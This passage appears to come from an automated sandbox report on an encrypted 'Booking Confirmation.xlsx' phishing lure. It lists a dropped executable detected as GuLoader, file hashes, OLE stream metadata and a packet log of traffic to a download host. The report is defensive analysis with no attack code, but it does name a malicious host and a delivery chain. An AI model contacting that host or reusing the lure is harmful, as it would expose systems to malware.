Preview:	.PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.\|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...

C:\Users\user\Desktop\~$Booking Confirmation.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	267376
Entropy (8bit):	4.7769054763067915
Encrypted:	false
SSDEEP:	1536:x2M5j2eBXFScbssSe/W+dMa27qQ0Z9Dfs4IwNAvgiIOm72tNHLg/8A:T5FXrbVTeE2uQU7s49AMUrg/8A
MD5:	FCFB0EC70F1419EDE8A534CC95CB61E9
SHA1:	D3B529D77F1DE00D63A75B3956D4BCF6BBCE30CA
SHA-256:	FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
SHA-512:	FFEC36B157F889A2BD351B9D8423B247138A5FD2E57DE83BB1253336518431136A265D244B653AF470A8D04E2674C4CADF467C065A7FC38F10EFFEDD705AB248
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 7%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....FR.................`..........p........p....@..........................................................................d..(........z..........X............... .......................................(... ....................................text...0Y.......`.................. ..`.data........p.......p..............@....rsrc....z..........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.994338822907313
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Booking Confirmation.xlsx
File size:	1221992
MD5:	870a4c72bccd58de144c7b845d56c626
SHA1:	482681f75180bbb1286e1f93ce44dfae0b6b0007
SHA256:	37fffcbacca59290a7a3b6271ebf475a50b9e17eba113459cfc00508a7268b68
SHA512:	0281d94a5119fbd46012ae0c9d9aedad400264803feb6f1224f031750673d7f30de78f594713b7a00c081794d39173f4992fd27dd9e8ef0fae4f82ffe523cfbf
SSDEEP:	24576:kux4KztYcWgmU+Y/6bHtPVa6dneKiAqI3RW6Myfhc:pmK6ImUP8tPVa1Kcjyfhc
File Content Preview:	........................>...............................................................................................z.......z.......\|......................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Booking Confirmation.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 208

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	208
Entropy:	3.35153409046
Base64 Encoded:	False
Data ASCII:	l . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . A E S 1 2 8 . . . . . . . . . . . . .
Data Raw:	6c 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1208680

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	1208680
Entropy:	7.99865188998
Base64 Encoded:	True
Data ASCII:	V q . . . . . . . . . . . . . . J E . . . . . y 1 R . ? . . . . . . . . ] . . . H . . . . . { p q . I . . 8 * . . . } . . . . . " = . b . f . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . .
Data Raw:	56 71 12 00 00 00 00 00 82 1e eb 04 b0 13 98 8c 4a 45 bb 83 e7 b6 b0 79 31 52 a0 3f 01 ac 9e d3 bd 82 8b b7 5d 0a de b6 48 c8 00 ac 0c b4 7b 70 71 da 49 03 c5 38 2a af 06 1b 7d da 9c ae b6 83 22 3d e8 62 a2 66 0f e8 ae 08 18 34 db 0b 06 a6 07 f5 eb 23 2e 80 07 db ae 08 18 34 db 0b 06 a6 07 f5 eb 23 2e 80 07 db ae 08 18 34 db 0b 06 a6 07 f5 eb 23 2e 80 07 db ae 08 18 34 db 0b 06 a6

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.67069001022
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . ` . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . . . . . . . . . w . . . . . . . . h \| . . . . . . . . . . . . 6 G . M . $ = a _ ? . . S . P . . . . . . . " . . . @ . . \| . .
Data Raw:	03 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 60 11 e9 09 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 14, 2021 16:55:35.897506952 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.153352022 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.153625965 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.154084921 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.409609079 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.409646034 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.409670115 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.409693003 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.409729004 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.409774065 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.664187908 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.664213896 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.664227009 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.664238930 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.664453983 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.664853096 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.664872885 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.664917946 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.664928913 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.664962053 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.664969921 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.665000916 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.919806004 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.919847965 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.920083046 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.921953917 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.921977043 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.921994925 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.922015905 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.922039032 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.922054052 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.922075033 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.922096014 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.922123909 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.922130108 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.922152042 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.922161102 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.922180891 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.922192097 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.922224045 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.922280073 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.922302008 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.922329903 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.922357082 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.922379971 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.922404051 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:36.922447920 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.922467947 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:36.924274921 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.174513102 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.174547911 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.174573898 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.174653053 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.174719095 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.174815893 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.177390099 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.177429914 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.177514076 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.177553892 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.177598953 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.177658081 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.177680016 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.177701950 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.177716970 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.177757978 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.177798986 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.177934885 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.177982092 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.178034067 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.178080082 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.178111076 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.178124905 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.178138971 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.178162098 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.178199053 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.178231001 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.178287983 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.178324938 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.178426027 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.178448915 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.178464890 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.178488016 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.178685904 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.178731918 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.178793907 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.178831100 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.178843975 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.178885937 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.178950071 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.178973913 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.178986073 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.179012060 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.179034948 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.179059029 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.179069996 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.179112911 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.179131985 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.179157972 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.179168940 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.179205894 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.179394960 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.179419041 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.179442883 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.179456949 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.179487944 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.179512024 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.179533958 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.179553986 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.179680109 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.182404041 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.431487083 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.431519032 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.431540012 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.431561947 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.431582928 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.431600094 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.431708097 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.431720972 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.431730986 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.431757927 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.431813955 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.431823969 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.436085939 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.436239004 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.436280012 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.436304092 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.436387062 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.436415911 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.436460018 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.436465979 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.443891048 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.443926096 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.443949938 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.444197893 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.444288015 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.444313049 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.444358110 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.444382906 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.444416046 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.444452047 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.444489002 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.444521904 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.444550991 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.445915937 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.446762085 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.446777105 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.446780920 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.446784019 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.446787119 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.446789980 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.446894884 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.447021961 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.447066069 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.447313070 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.447551966 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.447581053 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.447637081 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.447643995 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.447752953 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.447778940 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.447827101 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.447833061 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.447892904 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.447947979 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.447982073 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.448122025 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.448132992 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.448189020 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.448232889 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.448271990 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.448278904 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.448328018 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.448344946 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.448518038 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.448529005 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.448577881 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.448625088 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.448667049 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.448673010 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.448704004 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.448743105 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.448766947 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.448894978 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.448919058 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.448955059 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.449085951 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.449116945 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.449141979 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.449167013 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.449196100 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.449209929 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.449249983 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.449255943 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.449289083 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.449300051 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.449325085 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.449441910 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.449475050 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.449502945 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.449542046 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.457788944 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.686770916 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.686819077 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.686847925 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.686876059 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.686899900 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.686913013 CEST	49165	80	192.168.2.22	180.214.239.39
